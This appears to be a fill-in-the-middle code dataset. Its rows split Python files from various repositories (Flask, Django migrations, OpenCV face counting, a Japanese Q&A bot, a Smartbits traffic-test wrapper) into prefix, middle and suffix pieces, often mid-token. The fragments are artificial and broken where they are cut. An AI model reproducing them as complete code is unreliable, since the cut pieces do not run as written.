repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
| prefix
stringlengths 0
8.16k
| middle
stringlengths 3
512
| suffix
stringlengths 0
8.17k
|
|---|---|---|---|---|---|---|---|---|
samuelmasuy/Concordia-Schedule-to-Gcal
|
app/__init__.py
|
Python
|
gpl-2.0
| 448
| 0.002232
|
# -*- coding:
|
utf-8 -*-
# ===========================================================================
#
# Copyright (C) 2014 Samuel Masuy. All rights reserved.
# samuel.masuy@gmail.com
#
# ===========================================================================
from flask import Flask
# Declare app object
app = Flask(__name__)
# tell flask where is the config file
app.config.from_o
|
bject('config')
app.debug = True
from app import views
|
stanford-mast/nn_dataflow
|
nn_dataflow/core/loop_enum.py
|
Python
|
bsd-3-clause
| 705
| 0.001418
|
""" $lic$
Copyright (C) 2016-2020 by Tsinghua
|
University and The Board of Trustees of
Stanford University
This program is free software: you can redistribute it and/or modify it under
the terms of the Modified BSD-3 License as published by the Open Source
Initiative.
This program is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE. See the BSD-3 License for more details.
You should have received a copy
|
of the Modified BSD-3 License along with this
program. If not, see <https://opensource.org/licenses/BSD-3-Clause>.
"""
'''
Enum for loop types.
'''
IFM = 0
OFM = 1
BAT = 2
NUM = 3
|
MidwestCommunications/django-askmeanything
|
askmeanything/migrations/0004_rmpub.py
|
Python
|
mit
| 4,171
| 0.010309
|
from south.db import db
from django.db import models
from askmeanything.models import *
class Migration:
def forwards(self, orm):
"Write your forwards migration here"
def backwards(self, orm):
"Write your backwards migration here"
models = {
'askmeanything.poll': {
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'polls'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': '
|
True'}),
'open': ('django.db.models.fields.B
|
ooleanField', [], {'default': 'True', 'blank': 'True'}),
'question': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'askmeanything.response': {
'answer': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'poll': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'responses'", 'to': "orm['askmeanything.Poll']"}),
'votes': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'auth.group': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)"},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['askmeanything']
|
thom-at-redhat/cfme_tests
|
cfme/tests/infrastructure/test_esx_direct_host.py
|
Python
|
gpl-2.0
| 3,626
| 0.001103
|
# -*- coding: utf-8 -*-
""" Tests of managing ESX hypervisors directly. If another direct ones will be supported, it should
not be difficult to extend the parametrizer.
"""
import pytest
import random
from cfme.infrastructure.provider import VMwareProvider
from utils.conf import cfme_data, credentials
from utils.net import resolve_hostname
from utils.providers import get_crud
from utils.version import Version
from utils.wait import wait_for
def pytest_generate_tests(metafunc):
arg_names = "provider", "provider_data", "original_provider_key"
arg_values = []
arg_ids = []
for provider_key, provider in cfme_data.get("management_systems", {}).iteritems():
if provider["type"] != "virtualcenter":
continue
hosts = provider.get("hosts", [])
if not hosts:
continue
version = provider.get("version", None)
if version is None:
# No version, no test
continue
if Version(version) < "5.0":
# Ignore lesser than 5
conti
|
nue
host = random.choice(hosts)
creds = credentials[host["credentials"]]
ip_address = resolve_hostname(host["name"])
cred = VMwareProvider.Credential(
principal=creds["username"],
secret=creds["password"],
verify_secret=creds["password"]
)
# Mock provider data
provider_data = {}
provider_data.update(provider)
provider
|
_data["name"] = host["name"]
provider_data["hostname"] = host["name"]
provider_data["ipaddress"] = ip_address
provider_data["credentials"] = host["credentials"]
provider_data.pop("host_provisioning", None)
provider_data["hosts"] = [host]
provider_data["discovery_range"] = {}
provider_data["discovery_range"]["start"] = ip_address
provider_data["discovery_range"]["end"] = ip_address
host_provider = VMwareProvider(
name=host["name"],
hostname=host["name"],
ip_address=ip_address,
credentials={'default': cred},
provider_data=provider_data,
)
arg_values.append([host_provider, provider_data, provider_key])
arg_ids.append("{}/random_host".format(provider_key))
metafunc.parametrize(arg_names, arg_values, ids=arg_ids, scope="module")
@pytest.yield_fixture(scope="module")
def setup_provider(provider, original_provider_key):
original_provider = get_crud(original_provider_key)
if original_provider.exists:
# Delete original provider's hosts first
for host in original_provider.hosts:
if host.exists:
host.delete(cancel=False)
# Get rid of the original provider, it would make a mess.
original_provider.delete(cancel=False)
provider.wait_for_delete()
provider.create()
provider.refresh_provider_relationships()
try:
wait_for(
lambda: any([
provider.num_vm() > 0,
provider.num_template() > 0,
provider.num_datastore() > 0,
provider.num_host() > 0,
]), num_sec=400, delay=5)
except:
provider.delete(cancel=False)
raise
yield
for host in provider.hosts:
if host.exists:
host.delete(cancel=False)
provider.delete(cancel=False)
provider.wait_for_delete()
def test_validate(provider, setup_provider, provider_data):
"""Since the provider (host) gets added in the fixture, nothing special has to happen here."""
provider.validate(db=False)
|
hknyldz/pisitools
|
pisilinux/pisilinux/db/historydb.py
|
Python
|
gpl-3.0
| 4,426
| 0.004293
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2008, TUBITAK/UEKAE
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# Please read the COPYING file.
#
import os
import pisilinux.context as ctx
import pisilinux.db.lazydb as lazydb
import pisilinux.history
class HistoryDB(lazydb.LazyDB):
def init(self):
self.__logs = self.__generate_history()
self.history = pisilinux.history.History()
def __generate_history(self):
logs = [x for x in os.listdir(ctx.config.history_dir()) if x.endswith(".xml")]
logs.sort(lambda x,y:int(x.split("_")[0]) - int(y.split("_")[0]))
logs.reverse()
return logs
def create_history(self, operation):
self.history.create(operation)
def add_and_update(self, pkgBefore=None, pkgAfter=None, operation=None, otype=None):
self.add_package(pkgBefore, pkgAfter, operation, otype)
self.update_history()
def add_package(self, pkgBefore=None, pkgAfter=None, operation=None, otype=None):
self.history.add(pkgBefore, pkgAfter, operation, otype)
def load_config(self, operation, package):
config_dir = os.path.join(ctx.config.history_dir(), "%03d" % operation, package)
if os.path.exists(config_dir):
import distutils.dir_util as dir_util
dir_util.copy_tree(config_dir, "/")
def save_config(
|
self, package, config_file):
hist_dir = os.path.join(ctx.config.history_dir(), self.history.ope
|
ration.no, package)
if os.path.isdir(config_file):
os.makedirs(os.path.join(hist_dir, config_file))
return
destdir = os.path.join(hist_dir, config_file[1:])
pisilinux.util.copy_file_stat(config_file, destdir);
def update_repo(self, repo, uri, operation = None):
self.history.update_repo(repo, uri, operation)
self.update_history()
def update_history(self):
self.history.update()
def get_operation(self, operation):
for log in self.__logs:
if log.startswith("%03d_" % operation):
hist = pisilinux.history.History(os.path.join(ctx.config.history_dir(), log))
hist.operation.no = int(log.split("_")[0])
return hist.operation
return None
def get_package_config_files(self, operation, package):
package_path = os.path.join(ctx.config.history_dir(), "%03d/%s" % (operation, package))
if not os.path.exists(package_path):
return None
configs = []
for root, dirs, files in os.walk(package_path):
for f in files:
configs.append(("%s/%s" % (root, f)))
return configs
def get_config_files(self, operation):
config_path = os.path.join(ctx.config.history_dir(), "%03d" % operation)
if not os.path.exists(config_path):
return None
allconfigs = {}
packages = os.listdir(config_path)
for package in packages:
allconfigs[package] = self.get_package_config_files(operation, package)
return allconfigs
def get_till_operation(self, operation):
if not [x for x in self.__logs if x.startswith("%03d_" % operation)]:
return
for log in self.__logs:
if log.startswith("%03d_" % operation):
return
hist = pisilinux.history.History(os.path.join(ctx.config.history_dir(), log))
hist.operation.no = int(log.split("_")[0])
yield hist.operation
def get_last(self, count=0):
count = count or len(self.__logs)
for log in self.__logs[:count]:
hist = pisilinux.history.History(os.path.join(ctx.config.history_dir(), log))
hist.operation.no = int(log.split("_")[0])
yield hist.operation
def get_last_repo_update(self, last=1):
repoupdates = [l for l in self.__logs if l.endswith("repoupdate.xml")]
repoupdates.reverse()
if not len(repoupdates) >= 2:
return None
if last != 1 and len(repoupdates) <= last:
return None
hist = pisilinux.history.History(os.path.join(ctx.config.history_dir(), repoupdates[-last]))
return hist.operation.date
|
kiyukuta/chainer
|
chainer/links/connection/parameter.py
|
Python
|
mit
| 1,222
| 0
|
from chainer import cuda
from chainer.functions.math import identity
from chainer import link
class Parameter(link.Link):
"""Link that just holds a parameter and returns it.
.. deprecated:: v1.5
The parameters are stored as variables as of v1.5. Use them directly
instead.
Args:
array: Initial parameter array.
Attributes:
W (~chainer.Variable): Parameter variable.
"""
def __init__(self, array
|
):
super(Parameter, self).__init__()
self.add_param('W', array.shape, dtype=array.dtype)
self.W.data = array
if isinstance(array, cuda.ndarray):
self.to_gpu(cuda.get_device_from_array(array))
def __call__(self, volatile=
|
'off'):
"""Returns the parameter variable.
Args:
volatile (~chainer.Flag): The volatility of the returned variable.
Returns:
~chainer.Variable: A copy of the parameter variable with given
volatility.
"""
# The first identity creates a copy of W, and the second identity cuts
# the edge if volatility is ON
W = identity.identity(self.W)
W.volatile = volatile
return identity.identity(W)
|
sampadsaha5/sympy
|
examples/beginner/basic.py
|
Python
|
bsd-3-clause
| 336
| 0.008929
|
#!/usr/bin/env
|
python
"""Basic example
Demonstrates how to create symbols and print some algebra operations.
"""
from sympy import Symbol, pprint
def main():
a = Symbol('a')
b = Symbol('b')
c = Symbol('c')
e = ( a*b*b + 2*b*a*b )**c
print('')
pprint(e)
print('')
if __name__ ==
|
"__main__":
main()
|
kvasnyj/face_counter
|
counter.py
|
Python
|
gpl-3.0
| 2,444
| 0.003273
|
import cv2
import numpy as np
import datetime as dt
# constant
faceCascade = cv2.CascadeClassifier('haarcascade_frontalface_alt.xml')
OPENCV_METHODS = {
"Correlation": 0,
"Chi-Squared": 1,
"Intersection": 2,
"Hellinger": 3}
hist_limit = 0.6
ttl = 1 * 60
q_limit = 3
# init variables
total_count = 0
prev_count = 0
|
total_delta = 0
stm = {}
q = []
term_crit = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 1)
video_capture = cv2.VideoCapture(0)
while True:
for t in list(stm): # short term memory
if (dt.datetime.now() - t).seconds > ttl:
stm.pop(t, None)
# Capture frame-by-frame
ret, frame = video_capture.read()
|
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = faceCascade.detectMultiScale(
gray,
scaleFactor=1.2,
minNeighbors=5,
minSize=(30, 30),
flags=cv2.CASCADE_SCALE_IMAGE
)
count = len(faces)
if len(q) >= q_limit: del q[0]
q.append(count)
isSame = True
for c in q: # Protect from fluctuation
if c != count: isSame = False
if isSame is False: continue
max_hist = 0
total_delta = 0
for (x, y, w, h) in faces:
# Draw a rectangle around the faces
cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
if count == prev_count: continue
# set up the ROI
face = frame[y: y + h, x: x + w]
hsv_roi = cv2.cvtColor(face, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(face, np.array((0., 60., 32.)), np.array((180., 255., 255.)))
face_hist = cv2.calcHist([face], [0], mask, [180], [0, 180])
cv2.normalize(face_hist, face_hist, 0, 255, cv2.NORM_MINMAX)
isFound = False
for t in stm:
hist_compare = cv2.compareHist(stm[t], face_hist, OPENCV_METHODS["Correlation"])
if hist_compare > max_hist: max_hist = hist_compare
if hist_compare >= hist_limit: isFound = True
if (len(stm) == 0) or (isFound is False and max_hist > 0):
total_delta += 1
stm[dt.datetime.now()] = face_hist
if prev_count != count:
total_count += total_delta
print("", count, " > ", total_count)
prev_count = count
# Display the resulting frame
cv2.imshow('Video', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# When everything is done, release the capture
video_capture.release()
cv2.destroyAllWindows()
|
BlueHoleUEC/BlueHoleUEC
|
ans_main_t3.py
|
Python
|
mit
| 21,255
| 0.046417
|
# coding: utf-8
#!/usr/bin/env python
#python のバージョン指定:python 3.5.0
#(条件)MeCabをpythonから利用することができる
import sys
import MeCab
import re
import pandas
from PIL import Image
#----外ファイルインポート----
import python_mecab
import get_nlc
import get_day_time
import record
import ans_main_t3
import add_q_main
import main_t3
from k3.main import K3
#k3システムからもらう"results"の形式
'''
{'all_and': 1,
'data': {'created_at': None,
'how_time': '10時間',
'id': 7,
'title': '剣道部のフライドチキン',
'updated_at': None,
'what': '剣道部のフライドチキン',
'when_day': '17',
'when_time': '10',
'where': '広場',
'who': '剣道部'},
'reliability': 4.0},
'''
#K3システムのインスタンス作成
k3 =K3()
#入出力を記録
rfs = record.record_for_s
rfu = record.record_for_u
#回答候補が一つの場合の応答
def one_ans(category_ans,result,count_row_start):
reliability = result[0]['reliability']
if reliability < 1:
rfs('>条件に合致するデータは見つかりませんでしたが、似たデータが一つ見つかりました。')
else:
rfs('>回答候補が一つ見つかりました。')
#リストの配列から辞書を取り出す
result = result[0]['data']
if category_ans == 'what':
print('----------')
print('category is what')
ans_what = result['what']
ans_title = result['title']
ans_when_time = result['when_time']
rfs(">" + ans_what + "'" + ans_title + "'" + 'があります。' + '(' + ans_when_time + ')')
print('----------')
elif category_ans == 'when':
print('----------')
print('category is when')
ans_title = result['title']
ans_when_day = result['when_day']
ans_when_time = result['when_time']
rfs('>title:' + str(ans_title))
rfs(">" +ans_when_day + '日の' + ans_when_time + '開始です。')
print('----------')
elif category_ans == 'who':
print('----------')
print('category is who')
ans_title = result['title']
ans_who = result['who']
rfs('>title:' + str(ans_title))
rfs(">" +ans_who + 'です。')
print('----------')
elif category_ans == 'where':
print('----------')
print('category is where')
ans_title = result['title']
ans_where = result['where']
rfs('>title:' + str(ans_title))
rfs('>場所は'+ ans_where + 'です。')
print('----------')
elif category_ans == 'how_time':
print('----------')
print('category is how_time')
ans_how = result['how_time']
ans_title = result['title']
rfs('>title:' + str(ans_title))
rfs(">" +ans_how + 'です。')
print('----------')
else:
print('>category is why or how')
rfs('>スタッフの方に引き継ぎます。')
#終了
record.record_A('----- conversation end -----')
#履歴の表示
df = pandas.read_csv('conversation_log.csv', header = None)
print_record = df[count_row_start:]
print(print_record)
sys.exit()
if reliability < 1:
if result['parent_id'] != None:
parent = k3.get_parent(result['parent_id'])
if parent['image']:
rfs('>参考に親データ画像を表示します')
#画像の読み込み
im = Image.open(parent['image'])
im.show()
#条件部分検索の複数回答候補をリスト化して表示
#自信度でテーブルをフィルタリング
def some_ans(category_ans,results,borderline,count_row_start):
rfs('>いくつかの回答候補が見つかりました。')
#解答をカウント数で管理
count = 0
for result in results:
#あらかじめ設定された信頼度以上のカウントのみを表示
if borderline >= count:
print('----------')
if category_ans == 'what':
#print('category is what')
result = result['data']
ans_what = result['what']
ans_title = result['title']
ans_when_time = result['when_time']
ans_where = result['where']
print('[' + str(count) + ']')
rfs(ans_what + "'" + ans_title + "'" + 'があります。' + '(' + ans_when_time + ')')
rfs('開催場所:' + ans_where)
elif category_ans == 'when':
#print('category is when')
result = result['data']
ans_title = result['title']
ans_when_day = result['when_day']
ans_when_time = result['when_time']
ans_where = result['where']
print('[' + str(count) + ']')
rfs('title:' + str(ans_title))
rfs(str(ans_when_day) + '日の' + str(ans_when_time) + '開始です。')
rfs('開催場所:' + ans_where)
elif category_ans == 'who':
#print('category is who')
result = result['data']
ans_title = result['title']
ans_name = result['who']
ans_when_time = result['when_time']
print('[' + str(count) + ']')
rfs('title:' + str(ans_title))
rfs(ans_name + 'さん。')
elif category_ans == 'where':
#print('category is where')
result = result['data']
ans_title = result['title']
ans_where = result['where']
ans_when_time = result['when_time']
print('[' + str(count) + ']')
rfs('title:' + str(ans_title))
rfs(ans_where + 'で行われます。')
elif category_ans == 'how_time':
#print('category is how_time')
result = result['data']
ans_title = result['title']
ans_how_time = result['how_time']
print('[' + str(count) + ']')
rfs(ans_title + ':' + ans_how_time + '時間')
else:
print('category is why or how')
rfs('スタッフの方に引き継ぎます。')
#終了
record.record_A('----- conversation end -----')
#履歴の表示
df = pandas.read_csv('conversation_log.csv', header = None)
print_record = df[count_row_start:]
print(print_record)
sys.exit()
#解答番号をカウントアップ
count += 1
print('----------')
#条件全検索の回答が複数ある時、
#信頼度のフィルタリングをしない
def some_ans_all(category_ans,results,count_row_start):
rfs('>いくつかの回答候補が見つかりました。')
#解答をカウント数で管理
count = 0
for result in results:
if result['all_and'] == 1:
print('----------')
if category_ans == 'what':
#print('category is what')
result = result['data']
ans_what = result['what']
ans_title = result['title']
ans_when_time = result['when_time']
ans_where = result['where']
print('[' + str(count) + ']')
rfs(ans_what + "'" + ans_title + "'" + 'があります。' + '(' + ans_when_time + ')')
rfs('開催場所:' + ans_where)
elif category_ans == 'when':
#print('category is when')
|
result = result['data']
ans_title = result['title']
ans_when_day = result['when_day']
ans_when_time = result['when_time']
ans_where = result['where']
print('[' + str(count) + ']')
rfs('title:' + str(ans_title))
rfs(str(ans_when_day) + '日の' + str(ans_when_time) + '開始です。')
rfs('開催場所
|
:' + ans_where)
elif category_ans == 'who':
#print('category is who')
result = result['data']
ans_title = result['title']
ans_name = result['who']
ans_when_time = result['when_time']
print('[' + str(count) + ']')
rfs('title:' + str(ans_title))
rfs(ans_name + 'さん。')
elif category_ans == 'where':
#print('category is where')
result = result['data']
ans_title = result['title']
ans_where = result['where']
ans_when_time = result['when_time']
print('[' + str(count) + ']')
rfs('title:' + str(ans_title))
rfs(ans_where + 'で行われます。')
elif category_ans == 'how_time':
#print('category is how_time')
result = result['data']
ans_title = result['title']
ans_how_time = result['how_time']
print('[' + str(count) + ']')
rfs(ans_title + ':' + ans_how_time + '時間')
else:
print('category is why or how')
rfs('スタッフへ引き継ぎます。')
#終了
record.record_A('----- conversation end -----',header = None)
#履歴の表示
df = pandas.read_csv('conversation_log.csv')
print_record = df[count_row_start:]
print(print_record)
sys.exit()
#解答番号をカウントアップ
count += 1
print('----------')
#情報検索部(k3)にアクセスしてDBを検索する
#該当するタプルはリスト化して返される
def look_k3(data):
k3.set_params(data)
return k3.search()
#ユーザーに欲しい情報があるか否かを質問して、
#ない場合は、もう一度初めからやり直す
#yes_or_no_one:一意の返答の場合
def yes_or_no_one(result,count_row_start):
if result['image'] != None:
rfs('>詳細を表示します')
im = Image.open(result['image'])
im.show()
rfs('>欲しい情報でしたか?(yes/no)')
u_ans = input('Input: ')
rfu(u_ans)
if u_ans == 'yes':
result_more = result
ans_main_t3.more_question(result_more)
elif u_ans == 'no':
rfs('>スタッフへ引き継ぐために履歴を表示します。')
record.record_A('----- conversation end -----')
#履歴の表示
df = pandas.read_csv('conversation_log.csv',header = None)
print_record = df[count_row_start:]
print(print_record)
sys.exit()
#ユーザーに欲しい情報があるか否かを質問して、
#ない場合は、もう一度初めからやり直す
#yes_or_no_one:複数の返答の場合
def yes_or_no_some(results,list_num,count_row_start):
rfs('>欲しい情報はありましたか?(yes/no)')
u_ans = input('Input: ')
rfu(u_ans)
if u_ans == 'yes':
#ユーザーが欲しかった情報の
|
willemneal/Docky
|
lib/pylint/test/functional/import_error.py
|
Python
|
mit
| 419
| 0.004773
|
""" Test that import errors are detected. """
# pylint: disable=invalid-name, unused-import, no-absolute-import
import totally_missing # [import-error]
try:
import maybe_missing
except ImportError:
maybe_missing = None
try:
import maybe_missing_1
except (ImportError, SyntaxError):
maybe_missing_1 = None
try:
import maybe_missing_2 # [import-error]
except ValueError:
maybe_missing_2 = Non
|
e
|
|
MediaKraken/MediaKraken_Deployment
|
source/common/common_metadata_tv_intro.py
|
Python
|
gpl-3.0
| 1,725
| 0.001159
|
"""
Copyright (C) 2016 Quinn D Granfor <spootdev@gmail.com>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
version 2, as published by the Free Software Foundation.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License version 2 for more details.
You should have received a copy of the GNU General Public License
version 2 along with this program; if not, write to the Free
Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
MA 02110-1301, USA.
"""
from bs4 import BeautifulSoup
from
|
common import common_logging_elasticsearch_httpx
from . import common_network
from . import common_string
# http://www.tv-intros.com
def com_tvintro_download(media_name):
"""
Try to grab intro from tvintro
"""
# TODO doe
|
sn't match the tvintro........base from theme
data = BeautifulSoup(common_network.mk_network_fetch_from_url(
'http://www.tv-intros.com/' + media_name[0].upper() + '/'
+ common_string.com_string_title(media_name).replace(' ', '_')
+ ".html", None)).find(id="download_song")
if data is not None:
common_logging_elasticsearch_httpx.com_es_httpx_post(message_type='info',
message_text={'href': data['href']})
common_network.mk_network_fetch_from_url('http://www.tv-intros.com'
+ data['href'], 'theme.mp3')
return True # success
return False # no match
|
abawchen/leetcode
|
tests/012.py
|
Python
|
mit
| 1,527
| 0.003929
|
import unittest
import sys
sys.path.append('./')
solutions = __import__('solutions.012_integer_to_roman', fromlist='*')
class Test012(unittest.TestCase):
def test_intToRoman(self):
s = solutions.Solution()
self.assertEqual(s.intToRoman(1), "I")
self.assertEqual(s.intToRoman(2), "II")
self.assertEqual(s.intToRoman(3), "III")
self.assertEqual(s.intToRoman(4), "IV")
self.assertEqual(s.intToRoman(5), "V")
self.assertEqual(s.intToRoman(6), "VI")
self.assertEqual(s.intToRoman(7), "VII")
self.assertEqual(s.intToRoman(8), "VIII")
self.assertEqual(s.intToRoman(9), "IX")
self.assertEqual(s.intToRoman(10), "X")
self.assertEqual(s.intToRoman(28), "XXVIII")
self.assertEqual(s.intToRoman(29), "XXIX")
self.assertEqual(s.intToRoman(40), "XL")
self.assertEqual(s.intToRoman(41), "XLI")
self.ass
|
ertEqual(s.intToRoman(89), "LXXXIX")
self.assertEqual(s.intToRoman(98), "XCVIII")
self.assertEqual(s.int
|
ToRoman(99), "XCIX")
self.assertEqual(s.intToRoman(316), "CCCXVI")
self.assertEqual(s.intToRoman(400), "CD")
self.assertEqual(s.intToRoman(499), "CDXCIX")
self.assertEqual(s.intToRoman(894), "DCCCXCIV")
self.assertEqual(s.intToRoman(1499), "MCDXCIX")
self.assertEqual(s.intToRoman(3999), "MMMCMXCIX")
for i in xrange(1, 4000):
s.intToRoman(i)
if __name__ == '__main__':
unittest.main()
|
kdart/pycopia
|
QA/pycopia/smartbits/smartlib.py
|
Python
|
apache-2.0
| 8,204
| 0.005241
|
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This is a high-level object interface the the Smartbits test system. It
also imports all of the low-level API calls. These low-level wrapper
classes are automatically generated by SWIG. You must first install the
smartbitsmodule in order for this to work. The SWIG program wraps the the
smartlib C API and this smartbits package makes it available to the Python
programmer. This module also defines some utility functions.
"""
from pycopia.smartbits.SMARTBITS import *
from pycopia.smartbits.smartbits_struct import *
from pycopia.smartbits.smartbits_func import *
SmartlibError = smartbits_funcc.SmartlibError
class SmartbitsError(SmartlibError):
pass
# you can subclass smartlib structures and add methods!
class HTCount(HTCountStructure):
pass
# some helpful functions follow, borrowed from Smartlib sample C code.
def linkToSmartBits(ipaddr=None, port=16385):
# ETGetLinkStatus will be positive if we're linked
try:
st = ETGetLinkStatus()
except SmartlibError, err:
if not ipaddr:
ipaddr = raw_input ("Enter IP address of SmartBits chassis ==> ")
try:
NSSocketLink(ipaddr,port,RESERVE_NONE)
except SmartlibError, err:
print_error_desc(err)
raise SmartbitsError, err[0]
def resetCard(hub, slot, port):
"""
HTResetPort resets card to power on defaults
"""
HTResetPort(RESET_FULL, hub, slot, port)
def setFill(hub, slot, port, fill_len):
"""
setFill(hub, slot, port, fill_len)
Sets the backgound fill pattern. The first 6 bytes are set to 0xFF
to create a broadcast packet. The rest of the packet is filled with 0xAA.
"""
fillData = "\xFF" * 6 + "\xAA" * fill_len
HTFillPattern( len(fillData), fillData, hub, slot, port)
def setVFD1(h1, s1, p1):
"""
Sets up VFD1 to overwrite the source MAC area of the packet
VFD 1 and 2 work like counters, will overwrite 1 to 6 bytes
and can be set static, increment or decrement.
Since we have set the fill to have FF FF FF FF FF FF in the first
six bytes and this VFD has an offset of 48 bits it will overwrite the
next six bytes with 66 55 44 33 22 11
"""
vfdstruct = HTVFDStructure()
# MAC will increment with each successive packet
vfdstruct.Configuration = HVFD_INCR
# will overwrite 6 bytes
vfdstruct.Range = 6
# 48 bits (6 bytes) after preamble - SOURCE MAC
vfdstruct.Offset = 48
# order is 0 = LSB - will produce a MAC address 66 55
|
44 33 22 11
# XXX current interface uses pointers
vfdData = ptrcreate("int",0,6)
ptrset(vfdData, 0x11, 0)
ptrset(vfdData, 0x22, 1)
ptrset(vfdData, 0x33, 2)
ptrset(vfdData, 0x44, 3)
ptrset(vfdData, 0x55, 4)
ptrset(vfdData, 0x66, 5)
# Associate the data w
|
ith the VFD structure
vfdstruct.Data = vfdData
# will increment 5 times then repeat LSB of Source MAC will
# follow 11 12 13 14 15 11 12 pattern
vfdstruct.DataCount = 5
# send to config card
HTVFD( HVFD_1, vfdstruct, h1, s1, p1)
ptrfree(vfdData)
def setTrigger(h1, s1, p1):
"""
setTrigger
Sets a trigger to match the base source MAC address. Since we have a
cycle count of five on the VFD1 we are triggering on, our trigger will fire
every fifth packet.
"""
MyTrigger = HTTriggerStructure()
# start 48 bits after preamble (SOURCE MAC)
MyTrigger.Offset = 48
# trigger pattern is 6 bytes long
MyTrigger.Range = 6
# data to match is 66 55 44 33 22 11
# XXX future interface, use typemaps to allow python list assignment to
# memeber arrays.
MyTrigger.Pattern = [0x11, 0x22, 0x33, 0x44, 0x55, 0x66]
# send config to card
HTTrigger( HTTRIGGER_1, HTTRIGGER_ON, MyTrigger, h1, s1, p1)
def clearCounters(h1, s1, p1):
"""
clearCounters
zero out the counters on the target Hub Slot Port
"""
HTClearPort( h1, s1, p1)
def sendPackets(h1, s1, p1):
"""
sendPackets
HTRun will control transmission state of the card - with HTRUN mode it
will start transmitting, with HTSTOP it will stop transmitting.
A one second delay ensures the card has started transmitting, a while
loop checks to ensure the card has stopped transmitting before exiting.
The final 1 second wait allows time for the packets to get to the receive card.
"""
# Start transmission - card will transmit at whatever mode it is set to
HTRun( HTRUN, h1, s1, p1)
cs = HTCountStructure()
# Library 3.09 and higher includes delay function
NSDelay(1)
# Now wait until transmission stops
HTGetCounters( cs, h1, s1, p1)
while cs.TmtPktRate != 0:
HTGetCounters( cs, h1, s1, p1)
NSDelay(1)
def promptForEnter():
"""
promptForEnter
Press Enter to continue procedure
waits until user presses ENTER
"""
raw_input("Press ENTER to continue.")
def showCounters(h1, s1, p1):
"""
showCounters
Display counts on target card. HTClearPort will clear couts
Card counter alwasy run. There is no Start command for counters.
Each element has a corresponding Rate (ie TmtPktRate RcvPktRate etc.
Thses counts will display the packets per second counts while the card
is transmitting.
"""
cs = HTCount()
HTGetCounters( cs, h1, s1, p1)
print "========================================="
print "Counter Data Card", (s1 + 1)
print "========================================="
print " Transmitted Pkts " , cs.TmtPkt
print " Received Pkts " , cs.RcvPkt
print " Collisions " , cs.Collision
print " Received Triggers " , cs.RcvPkt
print " CRC Errors " , cs.CRC
print " Alignment Errors " , cs.Align
